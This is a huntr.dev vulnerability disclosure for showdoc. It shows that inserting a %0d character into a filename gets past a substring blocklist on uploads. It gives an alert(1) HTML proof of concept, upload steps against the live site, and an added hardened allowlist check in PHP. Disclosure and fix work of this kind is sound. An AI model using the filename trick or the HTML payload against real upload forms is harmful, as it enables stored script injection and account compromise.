huntr C25BFAD1-2611-4226-954F-009E50F966F7 (www.huntr.dev)
Reported by khanhchauminh, Jan 25, 2022 - 4:14 a.m.

in star7th/showdoc
security filter bypass
arbitrary file upload
compromised web pages
user account compromise
malicious code execution

EPSS

0.001

Percentile

33.4%

Description

There is a filter that is meant to prevent uploading php, HTML and svg file types, in the code snippet from line 115 to line 122 of AttachmentController.class.php:

        // Blocklist: a plain substring search for ".php", ".htm" or ".svg"
        // in the lowercased, tag-stripped filename.
        if (strstr(strip_tags(strtolower($uploadFile['name'])), ".php")
            || strstr(strip_tags(strtolower($uploadFile['name'])), ".htm")
            || strstr(strip_tags(strtolower($uploadFile['name'])), ".svg")
        ) {
            // Error message: "This file type is not supported"
            $this->sendError(10100, '不支持此文件类型');
            return false;
        }

However, I found a way to bypass this filter and upload arbitrary files with those file types by using the %0d character in the filename.

Proof of Concept

Create a malicious HTML file and name it phish.h%0dtml:

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1"/>
	<title>Test Upload File</title>
</head>
<body>
	<h1>Test upload</h1>
	<script>alert(1)</script>
</body>
</html>

Now, after logging in, click the arrow in the top right corner and go to File Library (https://www.showdoc.com.cn/attachment/index).
In the File Library page, click the Upload button and choose phish.h%0dtml.
After the upload succeeds, click the check button to open the file in a new tab.

You will see that the HTML file is executed; the same happens with the other blocked file types.
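Why the check above lets phish.h%0dtml through, and a hardened alternative, as an added PHP example that is not showdoc's own code: the first function mirrors the quoted filter, the second strips control characters before checking the real extension against an allowlist (the allowlist contents are an assumption).

```php
<?php
// Added example, not showdoc's own code: the quoted substring blocklist
// reproduced beside a hardened check that normalizes the name first.

// Mirrors the filter from AttachmentController.class.php: a substring
// search on the lowercased, tag-stripped name. true means "reject".
function vulnerableIsBlocked(string $name): bool
{
    $n = strip_tags(strtolower($name));
    return strstr($n, '.php') !== false
        || strstr($n, '.htm') !== false
        || strstr($n, '.svg') !== false;
}

// Hardened form: drop ASCII control characters (%0d is "\r") so the real
// extension is visible, then decide with an allowlist on that extension
// rather than a substring blocklist. true means "accept".
function hardenedIsAllowed(string $name): bool
{
    $allowed = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt']; // assumed policy
    // Remove 0x00-0x1F and 0x7F; "phish.h\rtml" becomes "phish.html".
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $name);
    // Work on the base name only and take its final extension.
    $ext = strtolower(pathinfo(basename($clean), PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allowed, true);
}

// Constructed sample names; the first is the report's PoC name with %0d
// decoded to a carriage return.
$samples = ["phish.h\rtml", 'page.php', 'report.pdf', 'photo.PNG'];
foreach ($samples as $s) {
    printf("%-16s blocklist rejects: %-3s allowlist accepts: %s\n",
        json_encode($s),
        vulnerableIsBlocked($s) ? 'yes' : 'no',
        hardenedIsAllowed($s) ? 'yes' : 'no');
}
```

The blocklist fails to reject the PoC name because ".h\rtml" does not contain ".htm", while the allowlist rejects it once the carriage return is removed and the extension is read as "html".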

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.
